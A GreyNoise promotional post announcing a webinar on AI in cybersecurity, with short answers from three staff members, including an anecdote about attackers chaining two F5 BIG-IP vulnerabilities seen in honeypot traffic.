The cybersecurity market is undergoing a noticeable shift with the integration of AI, transitioning from using AI as a replacement for Googling to leveraging its advanced capabilities in pattern recognition and anomaly detection. Currently, there are many questions about what AI can truly achieve today and what the future holds. To address this, we assembled a panel of seasoned security professionals for an open discussion on the real potential of AI in cybersecurity and what is merely adding to the noise.

On Thursday, May 30th, GreyNoise is hosting a live webinar “AI for Cybersecurity: Sifting the Noise.” To give you a taste of what’s to come, we have asked each of our presenters a key question touching on one of the many topics we will explore in the discussion, let’s dig into their answers below:

Bob Rudis, VP of Data Science and Research

Q: What do you think is currently the biggest lie about AI?

A: The biggest misconception is that AI (particularly LLMs/GPTs) is seen as more than just a tool. Unlike traditional machine learning or a dictionary/thesaurus, these AI systems are marketed as intelligent actors or companions. However, they are simply tools that excel at understanding human input and generating responses based on vast amounts of data. Their perceived intelligence comes from their ability to produce useful outputs by recognizing patterns in data, not from any inherent understanding or consciousness.

Daniel Grant, Principal Data Scientist

Q: What AI advancement in the past few years are you most excited about?

A: The most obvious advancement is the development of highly capable LLMs. Just a few years ago, getting GPT-2 to produce coherent text was a challenge. Now, we have 70-billion parameter models that can run on laptops and chatbots that can pass the Turing test at your local Toyota dealership. Another exciting advancement is the improved quality of vector databases, which allow for direct, real-time access to entire datasets, reducing the need for compact machine learning models.

Ron Bowes, Security Researcher

Q: What's the most surprising thing an AI you've used has surfaced?

A: At GreyNoise, we developed a tool called Sift, which runs traffic seen by honeypots through magic machine-learning algorithms to help us (and customers!) see what attackers are up to each day.

One exploit that stood out to me a couple months ago was an attempt to exploit F5 BIG-IP that I wrote about on our Labs Grimoire blog. I'd recently spent time tidying up our F5 BIG-IP rules, since there's a lot of overlap between the various vulnerabilities and exploits (that is, several different vulnerabilities use very similar-looking exploits, and some of our older tags were mixing them up). One of the vulnerabilities I ran into was an exploit for CVE-2022-1388 (auth bypass), chained with CVE-2022-41800 (authenticated code execution, which I initially discovered and reported).

What was particularly interesting about that one is that they used the proof of concept (PoC) from the original CVE-2022-41800 disclosure, which I had designed to look super obvious, instead of using the actual exploit we also released. Not only that, but because CVE-2022-41800 is an *authenticated* RCE, they combined my PoC with a separate authentication-bypass vulnerability (CVE-2022-1388), which already had an RCE exploit that didn't require a secondary vulnerability. So, not only did they use the super obvious PoC, its usage was entirely unnecessary as well!

Presumably, the point of using this unusual combination was to avoid detection, but instead they just stood out more!

---

If these insights pique your interest, join us on Thursday for the live event where you can ask your own questions to our expert panel.

This article is a summary of the full, in-depth version on the GreyNoise Labs blog.
Read the full report
GreyNoise Labs logo
Link to GreyNoise Twitter account
Link to GreyNoise Twitter account